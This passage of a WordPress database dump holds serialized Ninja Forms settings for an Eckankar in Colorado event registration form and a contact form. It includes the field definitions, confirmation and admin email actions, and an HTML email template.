</p>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:4:\"HTML\";s:9:\"field_key\";s:4:\"html\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:526;}i:10;a:2:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:11;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:6:\"Submit\";s:3:\"key\";s:20:\"submit_1649194061669\";s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:16:\"processing_label\";s:10:\"Processing\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:8:\"Register\";s:9:\"field_key\";s:8:\"register\";}s:2:\"id\";i:527;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:42:\"Your form has been successfully submitted.\";s:5:\"order\";s:1:\"1\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:47:\"<p>Thank you for registering for our event.</p>\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:222;}i:1;a:2:{s:8:\"settings\";a:25:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:23:\"User Email Confirmation\";s:2:\"to\";s:13:\"{field:email}\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:39:\"Thank you for registering for our event\";s:13:\"email_message\";s:72:\"<p>Your registration details are below:</p><p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:20:\"{system:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:220;}i:2;a:2:{s:8:\"settings\";a:25:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:24:\"Admin Email Notification\";s:2:\"to\";s:20:\"{system:admin_email}\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:62:\"New Event Registration from {field:firstname} {field:lastname}\";s:13:\"email_message\";s:67:\"<p>Registration details are below:</p><p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:221;}i:3;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:17:\"Record Submission\";s:5:\"order\";s:1:\"3\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:219;}}s:8:\"settings\";a:24:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:0:\"\";s:5:\"title\";s:18:\"Event Registration\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:10:\"form_title\";s:18:\"Event Registration\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"1\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:3:\"key\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:11:{i:0;s:37:\"eck_temple_beautify_day_1649193811532\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:7:\"textbox\";i:6;s:4:\"hr_1\";i:7;s:78:\"let_us_know_if_you_need_more_event_information_or_have_questions_1649193768671\";i:8;s:4:\"hr_2\";i:9;s:4:\"html\";i:10;s:20:\"submit_1649194061669\";}s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:4:{i:522;i:522;i:523;i:523;i:524;i:524;s:5:\"tmp-1\";s:5:\"tmp-1\";}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(56,'a:7:{s:2:\"id\";i:56;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:9:{i:0;a:2:{s:8:\"settings\";a:22:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"0\";s:11:\"idAttribute\";s:2:\"id\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:229:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\r\nPlease Enter Your Information Below\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:155:\"<p></p><p></p><p style=\"color: #23507d; font-size:20px; font-weight:bold;\">RSVP for \'Beautify Day\' at the ECK Temple of Colorado<br>May 14th, 2022 <br></p>\";s:3:\"key\";s:8:\"html_267\";s:4:\"type\";s:4:\"html\";s:14:\"drawerDisabled\";b:0;s:15:\"container_class\";s:0:\"\";s:9:\"field_key\";s:8:\"html_267\";s:11:\"field_label\";s:4:\"Text\";}s:2:\"id\";i:529;}i:1;a:2:{s:8:\"settings\";a:52:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"1\";s:11:\"idAttribute\";s:2:\"id\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_268\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:15:\"one-third first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:4:\"type\";s:7:\"textbox\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_268\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:530;}i:2;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"2\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_269\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_269\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:9:\"one-third\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:531;}i:3;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"3\";s:11:\"idAttribute\";s:2:\"id\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_270\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_270\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:9:\"one-third\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"show_desc\";s:1:\"0\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:8:\"num_sort\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:15:\"input_limit_msg\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:11:\"input_limit\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";}s:2:\"id\";i:532;}i:4;a:2:{s:8:\"settings\";a:18:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"4\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:2:\"hr\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:2:\"hr\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:6:\"hr_273\";s:11:\"field_label\";s:2:\"hr\";s:9:\"field_key\";s:6:\"hr_273\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:533;}i:5;a:2:{s:8:\"settings\";a:36:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"6\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:44:\"If you have a message, please enter it here:\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";i:0;s:7:\"default\";s:0:\"\";s:3:\"key\";s:56:\"if_you_have_a_message_please_enter_it_here_1649199448265\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:12:\"textarea_276\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:535;}i:6;a:2:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"7\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:147:\"Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:147:\"Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.\";s:3:\"key\";s:8:\"html_305\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_305\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:536;}i:7;a:2:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"8\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"size\";s:7:\"visible\";s:13:\"element_class\";s:0:\"\";s:9:\"field_key\";s:13:\"recaptcha_277\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:30:\"Confirm that you are not a bot\";s:3:\"key\";s:13:\"recaptcha_277\";s:8:\"required\";s:1:\"1\";s:9:\"desc_text\";s:0:\"\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"show_desc\";s:1:\"0\";s:9:\"label_pos\";s:4:\"left\";s:4:\"type\";s:9:\"recaptcha\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:30:\"Confirm that you are not a bot\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";}s:2:\"id\";i:537;}i:8;a:2:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"9\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_278\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_278\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:538;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-04-05 14:40:44\";s:5:\"label\";s:9:\"Save Form\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:223;}i:1;a:2:{s:8:\"settings\";a:27:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"0\";s:10:\"created_at\";s:19:\"2022-04-05 14:40:44\";s:5:\"label\";s:17:\"Send copy to user\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_270}\";s:13:\"email_subject\";s:38:\"Western Slope Leadership Communication\";s:13:\"email_message\";s:5028:\"<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                <td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello {field:textbox_268},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:if_you_have_a_message_please_enter_it_here_1649199448265}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";}s:2:\"id\";i:224;}i:2;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-04-05 14:40:44\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms 